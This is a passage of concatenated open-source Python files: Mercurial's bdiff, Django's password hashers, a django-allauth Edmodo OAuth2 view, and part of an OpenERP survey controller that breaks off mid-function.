MER-GROUP/intellij-community | plugins/hg4idea/testData/bin/mercurial/bdiff.py | 96 | 2318 | # bdiff.py - Python implementation of bdiff.c
#
# Copyright 2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct, difflib, re
def splitnewlines(text):
'''like str.splitlines, but only split on newlines.'''
lines = [l + '\n' for l in text.split('\n')]
if lines:
if lines[-1] == '\n':
lines.pop()
else:
lines[-1] = lines[-1][:-1]
return lines
def _normalizeblocks(a, b, blocks):
prev = None
r = []
for curr in blocks:
if prev is None:
prev = curr
continue
shift = 0
a1, b1, l1 = prev
a1end = a1 + l1
b1end = b1 + l1
a2, b2, l2 = curr
a2end = a2 + l2
b2end = b2 + l2
if a1end == a2:
while (a1end + shift < a2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
elif b1end == b2:
while (b1end + shift < b2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
r.append((a1, b1, l1 + shift))
prev = a2 + shift, b2 + shift, l2 - shift
r.append(prev)
return r
def bdiff(a, b):
a = str(a).splitlines(True)
b = str(b).splitlines(True)
if not a:
s = "".join(b)
return s and (struct.pack(">lll", 0, 0, len(s)) + s)
bin = []
p = [0]
for i in a: p.append(p[-1] + len(i))
d = difflib.SequenceMatcher(None, a, b).get_matching_blocks()
d = _normalizeblocks(a, b, d)
la = 0
lb = 0
for am, bm, size in d:
s = "".join(b[lb:bm])
if am > la or s:
bin.append(struct.pack(">lll", p[la], p[am], len(s)) + s)
la = am + size
lb = bm + size
return "".join(bin)
def blocks(a, b):
an = splitnewlines(a)
bn = splitnewlines(b)
d = difflib.SequenceMatcher(None, an, bn).get_matching_blocks()
d = _normalizeblocks(an, bn, d)
return [(i, i + n, j, j + n) for (i, j, n) in d]
def fixws(text, allws):
if allws:
text = re.sub('[ \t\r]+', '', text)
else:
text = re.sub('[ \t\r]+', ' ', text)
text = text.replace(' \n', '\n')
return text
| apache-2.0 |
nitin-cherian/Webapps | SimpleIsBetterThanComplex.com/myproject/.env/lib/python3.5/site-packages/django/contrib/auth/hashers.py | 64 | 22352 | from __future__ import unicode_literals
import base64
import binascii
import hashlib
import importlib
import warnings
from collections import OrderedDict
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache
from django.utils.crypto import (
constant_time_compare, get_random_string, pbkdf2,
)
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash
UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX
def is_password_usable(encoded):
if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX):
return False
try:
identify_hasher(encoded)
except ValueError:
return False
return True
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if password is None or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
hasher = identify_hasher(encoded)
hasher_changed = hasher.algorithm != preferred.algorithm
must_update = hasher_changed or preferred.must_update(encoded)
is_correct = hasher.verify(password, encoded)
# If the hasher didn't change (we don't protect against enumeration if it
# does) and the password should get updated, try to close the timing gap
# between the work factor of the current encoded password and the default
# work factor.
if not is_correct and not hasher_changed and must_update:
hasher.harden_runtime(password, encoded)
if setter and is_correct and must_update:
setter(password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt.
If password is None then a concatenation of
UNUSABLE_PASSWORD_PREFIX and a random string will be returned
which disallows logins. Additional random string reduces chances
of gaining access to staff or superuser accounts.
See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH)
hasher = get_hasher(hasher)
if not salt:
salt = hasher.salt()
return hasher.encode(password, salt)
@lru_cache.lru_cache()
def get_hashers():
hashers = []
for hasher_path in settings.PASSWORD_HASHERS:
hasher_cls = import_string(hasher_path)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % hasher_path)
hashers.append(hasher)
return hashers
@lru_cache.lru_cache()
def get_hashers_by_algorithm():
return {hasher.algorithm: hasher for hasher in get_hashers()}
@receiver(setting_changed)
def reset_hashers(**kwargs):
if kwargs['setting'] == 'PASSWORD_HASHERS':
get_hashers.cache_clear()
get_hashers_by_algorithm.cache_clear()
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
return get_hashers()[0]
else:
hashers = get_hashers_by_algorithm()
try:
return hashers[algorithm]
except KeyError:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
def identify_hasher(encoded):
"""
Returns an instance of a loaded password hasher.
Identifies hasher algorithm by examining encoded hash, and calls
get_hasher() to return hasher. Raises ValueError if
algorithm cannot be identified, or if hasher is not loaded.
"""
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
algorithm = 'unsalted_md5'
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
algorithm = 'unsalted_sha1'
else:
algorithm = encoded.split('$', 1)[0]
return get_hasher(algorithm)
def mask_hash(hash, show=6, char="*"):
"""
Returns the given hash, with only the first ``show`` number shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError as e:
raise ValueError("Couldn't load %r algorithm library: %s" %
(self.__class__.__name__, e))
return module
raise ValueError("Hasher %r doesn't specify a library attribute" %
self.__class__.__name__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ASCII
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method')
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() method')
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method')
def must_update(self, encoded):
return False
def harden_runtime(self, password, encoded):
"""
Bridge the runtime gap between the work factor supplied in `encoded`
and the work factor suggested by this hasher.
Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and
`self.iterations` is 30000, this method should run password through
another 10000 iterations of PBKDF2. Similar approaches should exist
for any hasher that has a work factor. If not, this method should be
defined as a no-op to silence the warning.
"""
warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method')
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 36000
digest = hashlib.sha256
def encode(self, password, salt, iterations=None):
assert password is not None
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = base64.b64encode(hash).decode('ascii').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
def must_update(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
return int(iterations) != self.iterations
def harden_runtime(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
extra_iterations = self.iterations - int(iterations)
if extra_iterations > 0:
self.encode(password, salt, extra_iterations)
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class Argon2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the argon2 algorithm.
This is the winner of the Password Hashing Competition 2013-2015
(https://password-hashing.net). It requires the argon2-cffi library which
depends on native C code and might cause portability issues.
"""
algorithm = 'argon2'
library = 'argon2'
time_cost = 2
memory_cost = 512
parallelism = 2
def encode(self, password, salt):
argon2 = self._load_library()
data = argon2.low_level.hash_secret(
force_bytes(password),
force_bytes(salt),
time_cost=self.time_cost,
memory_cost=self.memory_cost,
parallelism=self.parallelism,
hash_len=argon2.DEFAULT_HASH_LENGTH,
type=argon2.low_level.Type.I,
)
return self.algorithm + data.decode('ascii')
def verify(self, password, encoded):
argon2 = self._load_library()
algorithm, rest = encoded.split('$', 1)
assert algorithm == self.algorithm
try:
return argon2.low_level.verify_secret(
force_bytes('$' + rest),
force_bytes(password),
type=argon2.low_level.Type.I,
)
except argon2.exceptions.VerificationError:
return False
def safe_summary(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('variety'), variety),
(_('version'), version),
(_('memory cost'), memory_cost),
(_('time cost'), time_cost),
(_('parallelism'), parallelism),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(data)),
])
def must_update(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
argon2 = self._load_library()
return (
argon2.low_level.ARGON2_VERSION != version or
self.time_cost != time_cost or
self.memory_cost != memory_cost or
self.parallelism != parallelism
)
def harden_runtime(self, password, encoded):
# The runtime for Argon2 is too complicated to implement a sensible
# hardening algorithm.
pass
def _decode(self, encoded):
"""
Split an encoded hash and return: (
algorithm, variety, version, time_cost, memory_cost,
parallelism, salt, data,
).
"""
bits = encoded.split('$')
if len(bits) == 5:
# Argon2 < 1.3
algorithm, variety, raw_params, salt, data = bits
version = 0x10
else:
assert len(bits) == 6
algorithm, variety, raw_version, raw_params, salt, data = bits
assert raw_version.startswith('v=')
version = int(raw_version[len('v='):])
params = dict(bit.split('=', 1) for bit in raw_params.split(','))
assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p'))
time_cost = int(params['t'])
memory_cost = int(params['m'])
parallelism = int(params['p'])
return (
algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data,
)
class BCryptSHA256PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt_sha256"
digest = hashlib.sha256
library = ("bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
def encode(self, password, salt):
bcrypt = self._load_library()
# Hash the password prior to using bcrypt to prevent password
# truncation as described in #20138.
if self.digest is not None:
# Use binascii.hexlify() because a hex encoded bytestring is
# Unicode on Python 3.
password = binascii.hexlify(self.digest(force_bytes(password)).digest())
else:
password = force_bytes(password)
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, force_text(data))
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, force_bytes(data))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return OrderedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
def must_update(self, encoded):
algorithm, empty, algostr, rounds, data = encoded.split('$', 4)
return int(rounds) != self.rounds
def harden_runtime(self, password, encoded):
_, data = encoded.split('$', 1)
salt = data[:29] # Length of the salt in bcrypt.
rounds = data.split('$')[2]
# work factor is logarithmic, adding one doubles the load.
diff = 2**(self.rounds - int(rounds)) - 1
while diff > 0:
self.encode(password, force_bytes(salt))
diff -= 1
class BCryptPasswordHasher(BCryptSHA256PasswordHasher):
"""
Secure password hashing using the bcrypt algorithm
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
This hasher does not first hash the password which means it is subject to
the 72 character bcrypt password truncation, most use cases should prefer
the BCryptSHA256PasswordHasher.
See: https://code.djangoproject.com/ticket/20138
"""
algorithm = "bcrypt"
digest = None
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.sha1(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.md5(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
hash = hashlib.sha1(force_bytes(password)).hexdigest()
return 'sha1$$%s' % hash
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(force_bytes(password)).hexdigest()
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
def harden_runtime(self, password, encoded):
pass
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(force_str(password), salt)
assert data is not None # A platform like OpenBSD with a dummy crypt module.
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(force_str(password), data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
def harden_runtime(self, password, encoded):
pass
| mit |
beswarm/django-allauth | allauth/socialaccount/providers/edmodo/views.py | 40 | 1075 | import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from allauth.socialaccount.providers import registry
from .provider import EdmodoProvider
class EdmodoOAuth2Adapter(OAuth2Adapter):
provider_id = EdmodoProvider.id
access_token_url = 'https://api.edmodo.com/oauth/token'
authorize_url = 'https://api.edmodo.com/oauth/authorize'
profile_url = 'https://api.edmodo.com/users/me'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token})
extra_data = resp.json()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth2_login = OAuth2LoginView.adapter_view(EdmodoOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(EdmodoOAuth2Adapter)
| mit |
rvalyi/OpenUpgrade | addons/survey/controllers/main.py | 20 | 19094 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import json
import logging
import werkzeug
from datetime import datetime
from math import ceil
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT as DTF
from openerp.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class WebsiteSurvey(http.Controller):
## HELPER METHODS ##
def _check_bad_cases(self, cr, uid, request, survey_obj, survey, user_input_obj, context=None):
# In case of bad survey, redirect to surveys list
if survey_obj.exists(cr, SUPERUSER_ID, survey.id, context=context) == []:
return werkzeug.utils.redirect("/survey/")
# In case of auth required, block public user
if survey.auth_required and uid == request.website.user_id.id:
return request.website.render("website.403")
# In case of non open surveys
if survey.stage_id.closed:
return request.website.render("survey.notopen")
# If there is no pages
if not survey.page_ids:
return request.website.render("survey.nopages")
# Everything seems to be ok
return None
def _check_deadline(self, cr, uid, user_input, context=None):
'''Prevent opening of the survey if the deadline has turned out
! This will NOT disallow access to users who have already partially filled the survey !'''
if user_input.deadline:
dt_deadline = datetime.strptime(user_input.deadline, DTF)
dt_now = datetime.now()
if dt_now > dt_deadline: # survey is not open anymore
return request.website.render("survey.notopen")
return None
## ROUTES HANDLERS ##
# Survey start
@http.route(['/survey/start/<model("survey.survey"):survey>',
'/survey/start/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def start_survey(self, survey, token=None, **post):
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Test mode
if token and token == "phantom":
_logger.info("[survey] Phantom mode")
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id, 'test_entry': True}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
# END Test mode
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Manual surveying
if not token:
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
else:
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)], context=context)[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not open expired survey
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # Intro page
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
else:
return request.redirect('/survey/fill/%s/%s' % (survey.id, user_input.token))
# Survey displaying
@http.route(['/survey/fill/<model("survey.survey"):survey>/<string:token>',
'/survey/fill/<model("survey.survey"):survey>/<string:token>/<string:prev>'],
type='http', auth='public', website=True)
def fill_survey(self, survey, token, prev=None, **post):
'''Display and validates a survey'''
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Load the user_input
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)])[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not display expired survey (even if some pages have already been
# displayed -- There's a time for everything!)
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # First page
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, 0, go_back=False, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
elif user_input.state == 'done': # Display success message
return request.website.render('survey.sfinished', {'survey': survey,
'token': token,
'user_input': user_input})
elif user_input.state == 'skip':
flag = (True if prev and prev == 'prev' else False)
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, user_input.last_displayed_page_id.id, go_back=flag, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
else:
return request.website.render("website.403")
# AJAX prefilling of a survey
@http.route(['/survey/prefill/<model("survey.survey"):survey>/<string:token>',
'/survey/prefill/<model("survey.survey"):survey>/<string:token>/<model("survey.page"):page>'],
type='http', auth='public', website=True)
def prefill(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch previous answers
if page:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token), ('page_id', '=', page.id)], context=context)
else:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Return non empty answers in a JSON compatible format
for answer in previous_answers:
if not answer.skipped:
answer_tag = '%s_%s_%s' % (answer.survey_id.id, answer.page_id.id, answer.question_id.id)
answer_value = None
if answer.answer_type == 'free_text':
answer_value = answer.value_free_text
elif answer.answer_type == 'text' and answer.question_id.type == 'textbox':
answer_value = answer.value_text
elif answer.answer_type == 'text' and answer.question_id.type != 'textbox':
# here come comment answers for matrices, simple choice and multiple choice
answer_tag = "%s_%s" % (answer_tag, 'comment')
answer_value = answer.value_text
elif answer.answer_type == 'number':
answer_value = answer.value_number.__str__()
elif answer.answer_type == 'date':
answer_value = answer.value_date
elif answer.answer_type == 'suggestion' and not answer.value_suggested_row:
answer_value = answer.value_suggested.id
elif answer.answer_type == 'suggestion' and answer.value_suggested_row:
answer_tag = "%s_%s" % (answer_tag, answer.value_suggested_row.id)
answer_value = answer.value_suggested.id
if answer_value:
dict_soft_update(ret, answer_tag, answer_value)
else:
_logger.warning("[survey] No answer has been found for question %s marked as non skipped" % answer_tag)
return json.dumps(ret)
# AJAX scores loading for quiz correction mode
@http.route(['/survey/scores/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def get_scores(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch answers
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Compute score for each question
for answer in previous_answers:
tmp_score = ret.get(answer.question_id.id, 0.0)
ret.update({answer.question_id.id: tmp_score + answer.quizz_mark})
return json.dumps(ret)
# AJAX submission of a page
@http.route(['/survey/submit/<model("survey.survey"):survey>'],
type='http', methods=['POST'], auth='public', website=True)
def submit(self, survey, **post):
_logger.debug('Incoming data: %s', post)
page_id = int(post['page_id'])
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
questions_obj = request.registry['survey.question']
questions_ids = questions_obj.search(cr, uid, [('page_id', '=', page_id)], context=context)
questions = questions_obj.browse(cr, uid, questions_ids, context=context)
# Answer validation
errors = {}
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
errors.update(questions_obj.validate_question(cr, uid, question, post, answer_tag, context=context))
ret = {}
if (len(errors) != 0):
# Return errors messages to webpage
ret['errors'] = errors
else:
# Store answers into database
user_input_obj = request.registry['survey.user_input']
user_input_line_obj = request.registry['survey.user_input_line']
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', post['token'])], context=context)[0]
except KeyError: # Invalid token
return request.website.render("website.403")
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
user_input_line_obj.save_lines(cr, uid, user_input_id, question, post, answer_tag, context=context)
user_input = user_input_obj.browse(cr, uid, user_input_id, context=context)
go_back = post['button_submit'] == 'previous'
next_page, _, last = survey_obj.next_page(cr, uid, user_input, page_id, go_back=go_back, context=context)
vals = {'last_displayed_page_id': page_id}
if next_page is None and not go_back:
vals.update({'state': 'done'})
else:
vals.update({'state': 'skip'})
user_input_obj.write(cr, uid, user_input_id, vals, context=context)
ret['redirect'] = '/survey/fill/%s/%s' % (survey.id, post['token'])
if go_back:
ret['redirect'] += '/prev'
return json.dumps(ret)
# Printing routes
@http.route(['/survey/print/<model("survey.survey"):survey>',
'/survey/print/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def print_survey(self, survey, token=None, **post):
'''Display an survey in printable view; if <token> is set, it will
grab the answers of the user_input_id that has <token>.'''
return request.website.render('survey.survey_print',
{'survey': survey,
'token': token,
'page_nr': 0,
'quizz_correction': True if survey.quizz_mode and token else False})
@http.route(['/survey/results/<model("survey.survey"):survey>'],
type='http', auth='user', website=True)
def survey_reporting(self, survey, token=None, **post):
'''Display survey Results & Statistics for given survey.'''
result_template, current_filters, filter_display_data, filter_finish = 'survey.result', [], [], False
survey_obj = request.registry['survey.survey']
if not survey.user_input_ids or not [input_id.id for input_id in survey.user_input_ids if input_id.state != 'new']:
result_template = 'survey.no_result'
if 'finished' in post:
post.pop('finished')
filter_finish = True
if post or filter_finish:
filter_data = self.get_filter_data(post)
current_filters = survey_obj.filter_input_ids(request.cr, request.uid, filter_data, filter_finish, context=request.context)
filter_display_data = survey_obj.get_filter_display_data(request.cr, request.uid, filter_data, context=request.context)
return request.website.render(result_template,
{'survey': survey,
'survey_dict': self.prepare_result_dict(survey, current_filters),
'page_range': self.page_range,
'current_filters': current_filters,
'filter_display_data': filter_display_data,
'filter_finish': filter_finish
})
def prepare_result_dict(self,survey, current_filters=[]):
"""Returns dictionary having values for rendering template"""
survey_obj = request.registry['survey.survey']
result = {'survey':survey, 'page_ids': []}
for page in survey.page_ids:
page_dict = {'page': page, 'question_ids': []}
for question in page.question_ids:
question_dict = {'question':question, 'input_summary':survey_obj.get_input_summary(request.cr, request.uid, question, current_filters, context=request.context), 'prepare_result':survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context), 'graph_data': self.get_graph_data(question, current_filters)}
page_dict['question_ids'].append(question_dict)
result['page_ids'].append(page_dict)
return result
def get_filter_data(self, post):
"""Returns data used for filtering the result"""
filters = []
for ids in post:
#if user add some random data in query URI, ignore it
try:
row_id, answer_id = ids.split(',')
filters.append({'row_id': int(row_id), 'answer_id': int(answer_id)})
except:
return filters
return filters
def page_range(self, total_record, limit):
'''Returns number of pages required for pagination'''
total = ceil(total_record / float(limit))
return range(1, int(total + 1))
def get_graph_data(self, question, current_filters=[]):
'''Returns formatted data required by graph library on basis of filter'''
survey_obj = request.registry['survey.survey']
result = []
